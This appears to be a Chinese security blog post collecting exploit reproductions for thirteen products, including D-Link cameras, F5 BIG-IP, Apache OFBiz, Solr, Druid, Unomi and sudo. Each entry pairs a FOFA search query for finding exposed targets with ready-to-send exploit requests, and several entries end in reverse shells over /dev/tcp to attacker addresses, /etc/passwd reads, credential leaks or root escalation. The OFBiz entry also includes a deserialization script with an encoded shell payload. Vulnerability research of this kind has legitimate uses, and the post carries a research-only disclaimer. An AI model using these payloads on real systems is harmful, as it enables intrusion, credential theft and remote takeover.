一、【CNVD-2021-10543】MessageSolution邮件归档系统账号密码信息泄露
FOFA: title="MessageSolution Enterprise Email Archiving (EEA)" 前台的样子:
EXP:http://ip/authenticationserverservlet/访问如图,获取得到账号&密码:
二、【CVE-2020-25078】D-Link DCS系列监控账号密码信息泄露
FOFA: app="D_Link-DCS-2530L"直接访问需要账号密码登录:
EXP:http://ip/config/getuser?index=0如图,得到账号密码:
三、浪潮 ClusterEngineV4.0 任意命令执行
FOFA: title="TSCEV4.0"前台的样子:
登录处抓包,然后闭合username字段重发引发报错。如图:
构造POC,请求包内容:
POST /login HTTP/1.1Host: x.x.x.xConnection: closeContent-Length: 61Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: lang=cnop=login&username=admin`ping wsgpgq.dnslog.cn`&password=admin
四、JD-FreeFuck 后台RCE
FOFA: title="京东薅羊毛控制面板"前台的样子:
如果运气足够好的话:默认账号密码useradmin/supermanito
构造POC,请求包内容:
POST /runCmd HTTP/1.1Host: x.x.x.xContent-Length: 54Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1Origin: http://x.x.x.xContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://x.x.x.x/runCmdAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: connect.0.13416810928385314=s%3ADihBr216xOtHaZ6_yq86aIF0UNpiCo5v.jLFQG19H1e%2FrP6NwaH0UX2tjYwsFQuhXIIaSIkVG4JgConnection: closecmd=bash+jd.sh+%3Bcat+%2Fetc%2Fpasswd%3B+now&delay=500
尝试反弹shell:
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500成功!
五、【CVE-2021-21975】VMwar vRealize Operations Manager SSRF
FOFA:title="vRealize Operations Manager"前台的样子:
POC:
POST /casa/nodes/thumbprints HTTP/1.1Host: x.x.x.xContent-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Length: 20["127.0.0.1:443/ui"]
六、三星 WLAN AP WEA453e路由器远程命令执行
FOFA:title=="Samsung WLAN AP"前台的样子
POST /(download)/tmp/a.txt HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://x.x.x.x/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 48command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
七、Apache Solr =< 8.8.1任意文件读取漏洞
拉取镜像:
docker pull solr
启动容器:
docker run --name solr-8.8.1 -p 8983:8983 -itd solr
此时访问http://yourip:8983可以看到相关管理页面。由于是刚启动的环境,需要先对环境配置,否则无法直接创建core。
doker进入交互模式:
docker exec -it solr-8.8.1 /bin/bash
复制默认配置文件:
cp -r /opt/solr/server/solr/configsets/_default/conf /var/solr/data/new_core/①在面板上创建core:
②查看环境所有core名称:
http://your_ip:8983/solr/admin/cores?indexInfo=false&wt=json
③开启相关配置(我也不知道开的啥)
POST /solr/test/config HTTP/1.1Host: 10.0.133.170:8983Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36X-Requested-With: XMLHttpRequestReferer: http://10.0.133.170:8983/solr/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 84Content-type:application/json{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
④任意文件读取:
POST /solr/test/debug/dump?param=ContentStreams HTTP/1.1Host: 10.0.133.170:8983Content-type:application/x-www-form-urlencodedAccept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36X-Requested-With: XMLHttpRequestReferer: http://10.0.133.170:8983/solr/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 29stream.url=file:///etc/passwd
八、【CVE-2021-26295】Apache OFBiz RMI反序列化漏洞
拉取环境:
docker run -itd -p 8080:8080 -p 8443:8443 opensourceknight/ofbiz
拉取完成后访问漏洞环境:
http://your_ip:8080/webtools/control/SOAPService
DNSLOG验证:
poc:
https://github.com/ltfafei/CVE-2021-26295_Apache_OFBiz_POC①dns地址转ot字符串:
java -jar ysoserial.jar URLDNS http://7qo3nk.dnslog.cn> dnslog.ot执行完毕在本地生成dnslog.ot文件
②执行脚本将 上面的ot字符串再次转码
python3 ot_trans_hex.py -f dnslog.ot
③将转码后得到的16进制内容放入POC,然后发包:
GET /webtools/control/SOAPService HTTP/1.1Host: 10.0.133.170:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: OFBiz.Visitor=10100Connection: closeContent-Length: 1030<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><ser><map-HashMap><map-Entry><map-Key><cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74001037716f336e6b2e646e736c6f672e636e74000071007e0005740004687474707078740017687474703a2f2f37716f336e6b2e646e736c6f672e636e78</cus-obj></map-Key><map-Value><std-String value="7qo3nk.dnslog.cn"/></map-Value></map-Entry></map-HashMap></ser></soapenv:Body></soapenv:Envelope>
Dnslog得到回显,说明漏洞存在:
反弹shell:
①编码
将shell命令进行base64加密,加密地址:
http://www.jackson-t.ca/runtime-exec-payloads.html
②将加密的反弹shell命令进行编译
java -jar ysoserial.jar ROME "bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTAuMC4xMzMuMTQ4Lzk5OTkgPCYxJwo=}|{base64,-d}|{bash,-i}" | xxd|cut -f 2,3,4,5,6,7,8,9 -d " "|tr -d ' '|tr -d 'n'
然后把生成好的内容,替换下面脚本的hex_data变量内容
import requestsdef POC():hex_data = "aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f400000000000007708000000020000000273720028636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e4f626a6563744265616e829907de7604944a0200034c000e5f636c6f6e6561626c654265616e74002d4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f436c6f6e6561626c654265616e3b4c000b5f657175616c734265616e74002a4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f457175616c734265616e3b4c000d5f746f537472696e674265616e74002c4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f546f537472696e674265616e3b78707372002b636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e436c6f6e6561626c654265616edd61bbc5334f6b770200024c00115f69676e6f726550726f7065727469657374000f4c6a6176612f7574696c2f5365743b4c00045f6f626a7400124c6a6176612f6c616e672f4f626a6563743b78707372001e6a6176612e7574696c2e436f6c6c656374696f6e7324456d70747953657415f5721db403cb2802000078707371007e00027371007e000771007e000c7372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e0020000787000000705cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01007162617368202d63207b6563686f2c596d467a614341745979416e5a58686c5979426959584e6f494331704943592b4c32526c64693930593341764d5441754d4334784d7a4d754d5451344c7a6b354f546b67504359784a776f3d7d7c7b6261736536342c2d647d7c7b626173682c2d697d08003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572313835343937373437343638373401001f4c79736f73657269616c2f50776e657231383534393737343734363837343b002100020003000100040001001a000500060001000700000002000800040001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002f000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000033000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000036000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e0017000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003a000e0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e72707701007873720028636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e457175616c734265616ef58a18bbe5f618110200024c000a5f6265616e436c6173737400114c6a6176612f6c616e672f436c6173733b4c00045f6f626a71007e000978707672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c617465730000000000000000000000787071007e00147372002a636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e546f537472696e674265616e09f58e4a0f23ee310200024c000a5f6265616e436c61737371007e001c4c00045f6f626a71007e0009787071007e001f71007e00147371007e001b7671007e000271007e000d7371007e002071007e002371007e000d71007e000671007e000671007e000678"headers = {'Content-Type': 'text/xml' }post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><test:clearAllEntityCaches xmlns:test="http://ofbiz.apache.org/service/"><test:cus-obj>%s</test:cus-obj></test:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_datavuln_url = "http://10.0.133.170:8080/webtools/control/SOAPService"response = requests.post(url=vuln_url, data=post_data, headers=headers)if response.status_code == 200:print("请求成功,请检查监听地址响应")if __name__ == '__main__':POC()
监听端口,执行脚本,反弹shell:
九、【CVE-2021-22986】F5 BIG-IP 远程代码执行漏洞
环境下载地址:
https://downloads.f5.com/esd/eula.sv?sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.1&container=16.0.1_Virtual-Edition&path=&file=&B1=I+Accept
选择ova格式的下载,下载完成后可以直接用VM虚拟机打开。
打开后用户名:root,密码:default,第一次登录需要修改密码。成功登陆后,输入config,几次回车即可看到当前ip:
直接访问:https://10.0.133.179
POC:
POST /mgmt/tm/util/bash HTTP/1.1Host: 10.0.133.179Content-Type: application/jsonUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Content-Length: 39{"command":"run","utilCmdArgs":"-c id"}
命令被执行:
另外一个接口同样可以命令执行:
POST /mgmt/tm/access/bundle-install-tasks HTTP/1.1Host: 10.0.133.179Content-Type: application/jsonUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Content-Length: 38{"filePath":"`curl 48m8s3.dnslog.cn`"}
在这个接口进行shell反弹:
POST /mgmt/tm/access/bundle-install-tasks HTTP/1.1Host: 10.0.133.179Content-Type: application/jsonUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Content-Length: 59{"filePath":"`bash -i >& /dev/tcp/10.0.133.148/9090 0>&1`"}
十、Apache Druid 远程代码执行漏洞 (CVE-2021-25646) 漏洞复现
自行搭建需要Java8环境。
①下载:
https://mirrors.ocf.berkeley.edu/apache/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz②解压分发目录:
tar -xzf apache-druid-0.19.0-bin.tar.gzcd apache-druid-0.19.0
③启动运行:
./bin/start-micro-quickstart④访问:http://your_ip:8888/
⑤导入文件:Load data -> Local disk->connect
⑥填入
Base directory:
quickstart/tutorial/File filter:
wikiticker-2015-09-12-sampled.json.gz⑦然后一直下一步直到filter项,新建过滤。抓包打poc
⑧打POC反弹shell:
POST /druid/indexer/v1/sampler?for=filter HTTP/1.1Host: 192.168.1.1:8888Content-Length: 705Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Content-Type: application/json;charset=UTF-8Origin: http://192.168.1.1:8888Referer: http://192.168.1.1:8888/unified-console.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.1.2/8000 0>&1')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
十一、【CVE-2021-3156】: sudo缓冲区溢出提权
以非root用户登录系统,命令行:
sudoedit -s /
如果响应一个以sudoedit:开头的报错,那么表明存在漏洞。
如果响应一个以usage:开头的报错,那么表明补丁已经生效。
POC地址:https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz以普通用户解压poc并编译执行
cd CVE-2021-3156make./sudo-hax-me-a-sandwich root
提权成功:
十二、Apache Flink CVE-2020-17519任意文件读取
环境直接用vulhub,EXP:
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
十三、【CVE-2020-13942】Apache Unomi 远程代码执行漏洞
title="Unomi"
Dnslog检测:
POST /context.json HTTP/1.1Host: x.x.x.xConnection: closePragma: no-cacheCache-Control: no-cachesec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://x.x.x.x/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 491{"filters": [{"id": "sample","filters": [{"condition": {"parameterValues": {"": "script::Runtime r = Runtime.getRuntime(); r.exec('ping uqn9ja.dnslog.cn');"},"type": "profilePropertyCondition"}}]}],"sessionId": "sample"}
反弹shell:
POST /context.json HTTP/1.1Host: 10.0.133.170:8181User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Referer: http://10.0.133.170:8181/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 1115{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName("java.lang.Runtime")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals("getRuntime")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals("exec")}.{? #this.getParameters()[0].getType().getName().equals("java.lang.String")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,"/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/10.0.133.148/9999 0>&1"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"sample"}
-----------------------------------------------------------------------------------
若因图片清晰度问题影响观看,后台回复“最近怎么样”下载pdf版本查看
本文始发于微信公众号(安全鸭):不晓得起撒子标题
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论